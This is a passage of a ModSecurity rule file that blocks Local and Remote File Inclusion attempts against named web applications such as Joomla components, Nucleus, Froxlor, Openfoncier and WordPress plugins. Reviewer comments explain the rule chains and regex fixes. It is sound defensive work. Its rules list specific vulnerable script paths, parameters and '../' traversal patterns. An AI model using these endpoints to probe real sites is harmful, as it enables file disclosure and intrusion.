    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /tiki-jsplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# The next four chains (2012181, 2012182, 2012184, 2012185) differ only in the
# path link; all four test the same DIR_LIBS TX pattern. The path of 2012181
# is the short string /action.php, so it matches any request line holding it.

# (2012181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /action.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012181,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus action.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /nucleus/media.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012182,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus media.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012184) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /nucleus/xmlrpc/server.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012184,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus server.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012185) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /nucleus/libs/PLUGINADMIN.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012185,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DIR_LIBS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nucleus PLUGINADMIN.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012186) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt
# The last link names the argument aXconf[default_language] directly (not as a
# pattern), so the brackets are part of the literal argument name here.
SecRule REQUEST_LINE "@contains /modules/profile/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012186,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:aXconf[default_language] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012217) SpiderLabs Research (SLR) Public Vulns: ET
# WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /op/op.Login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012217,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37828'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Review notes for the chains in this part of the file ------------------
# Every chain has the same shape. Link 1 requires REQUEST_LINE to contain the
# application path and declares t:urlDecodeUni, t:htmlEntityDecode and
# t:normalisePathWin; the later links declare no transformations of their own.
# Link 2 requires REQUEST_LINE to contain "GET ". The last link tests the
# parameter: either ARGS:<name> contains "../", or &TX:'/RFI.*ARGS:<name>/'
# counts at least one TX variable whose name matches the pattern.
# A full match sets tx.msg, adds tx.critical_anomaly_score to
# tx.anomaly_score and stores the matched value under
# tx.<rule id>-WEB_ATTACK/RFI-<matched variable name>.
# NOTE(review): the &TX form presumably relies on a generic RFI rule having
# stored such a TX variable earlier - confirm the rule files load in that order.
# NOTE(review): link 2 ties each chain to request lines containing "GET ";
# the same parameter sent with another method is left to other rules.
# ---------------------------------------------------------------------------

# (2012334) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt
# NOTE(review): /RFI.*ARGS:id/ is unanchored, so it also counts TX names for
# arguments that merely begin with "id" - confirm that breadth is acceptable.
SecRule REQUEST_LINE "@contains /customer_ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012334,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012336,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012343) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt
SecRule REQUEST_LINE "@contains /active_auctions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012343,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:lan "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012344) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /lib/addressbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012344,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:basedir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File
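# Inclusion Attempt
# This chain has one extra link: besides the path and "GET ", the request line
# must also contain option=com_frontenduseraccess before ARGS:controller is
# tested. The path link alone (/index.php) is generic.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain"
    SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Review notes for the chains in this part of the file ------------------
# Every chain has the same shape. Link 1 requires REQUEST_LINE to contain the
# application path and declares t:urlDecodeUni, t:htmlEntityDecode and
# t:normalisePathWin; the later links declare no transformations of their own.
# Link 2 requires REQUEST_LINE to contain "GET ". The last link tests the
# parameter: either ARGS:<name> contains "../", or &TX:'/RFI.*ARGS:<name>/'
# counts at least one TX variable whose name matches the pattern.
# A full match sets tx.msg, adds tx.critical_anomaly_score to
# tx.anomaly_score and stores the matched value under
# tx.<rule id>-WEB_ATTACK/RFI-<matched variable name>.
# NOTE(review): the &TX form presumably relies on a generic RFI rule having
# stored such a TX variable earlier - confirm the rule files load in that order.
# NOTE(review): link 2 ties each chain to request lines containing "GET ";
# the same parameter sent with another method is left to other rules.
# ---------------------------------------------------------------------------

# (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /com_swmenupro/ImageManager/Classes/ImageManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012369,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /util/barcode.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012373,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:type "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012496) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt
# Review fix: inside a TX name pattern, '[' and ']' delimit a character class,
# so /RFI.*ARGS:global[approot]/ asked for "global" followed by one of the
# letters a, p, r, o, t and could not match a TX name ending in the literal
# argument name global[approot]. The brackets are now escaped so the literal
# name matches.
# NOTE(review): confirm on the ModSecurity build in use that the backslashes
# reach the pattern unchanged, and re-run the regression test for this id.
SecRule REQUEST_LINE "@contains /mod/vm/controller/AccessController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012496,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45656'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:global\[approot\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012497) SpiderLabs Research (SLR)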
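# Public Vulns: ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt
# Review fix: inside a TX name pattern, '[' and ']' delimit a character class,
# so /RFI.*ARGS:global[approot]/ asked for "global" followed by one of the
# letters a, p, r, o, t and could not match a TX name ending in the literal
# argument name global[approot]. The brackets are now escaped so the literal
# name matches.
# NOTE(review): confirm on the ModSecurity build in use that the backslashes
# reach the pattern unchanged, and re-run the regression test for this id.
SecRule REQUEST_LINE "@contains /mod/vm/model/dao.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012497,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45656'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:global\[approot\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Review notes for the chains in this part of the file ------------------
# Every chain has the same shape. Link 1 requires REQUEST_LINE to contain the
# application path and declares t:urlDecodeUni, t:htmlEntityDecode and
# t:normalisePathWin; the later links declare no transformations of their own.
# Link 2 requires REQUEST_LINE to contain "GET ". The last link tests the
# parameter: ARGS:<name> contains "../", ARGS:<name> matches a "../" regex,
# or &TX:'/RFI.*ARGS:<name>/' counts at least one TX variable whose name
# matches the pattern.
# A full match sets tx.msg, adds tx.critical_anomaly_score to
# tx.anomaly_score and stores the matched value under
# tx.<rule id>-WEB_ATTACK/RFI-<matched variable name>.
# NOTE(review): the &TX form presumably relies on a generic RFI rule having
# stored such a TX variable earlier - confirm the rule files load in that order.
# NOTE(review): link 2 ties each chain to request lines containing "GET ";
# the same parameter sent with another method is left to other rules.
# ---------------------------------------------------------------------------

# The five Openfoncier chains (2012561-2012565) differ only in the file name
# under /obj/; all test the same path_om TX pattern.

# (2012561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /obj/action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012561,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /obj/architecte.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /obj/avis.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /obj/bible.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012564,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /obj/blocnote.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012565,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt
# The last link names no operator, so the default regular-expression operator
# applies to "(?i:\.\.\\x2f)".
# NOTE(review): presumably the doubled backslash is collapsed by the config
# parser, leaving \.\.\x2f (a literal "../") - confirm with the regression test.
SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /includes/Cache/Lite/Output.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012572,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012583) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/mvc/ardeaMVC.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012583,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:appMVCPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaBlog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012584,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
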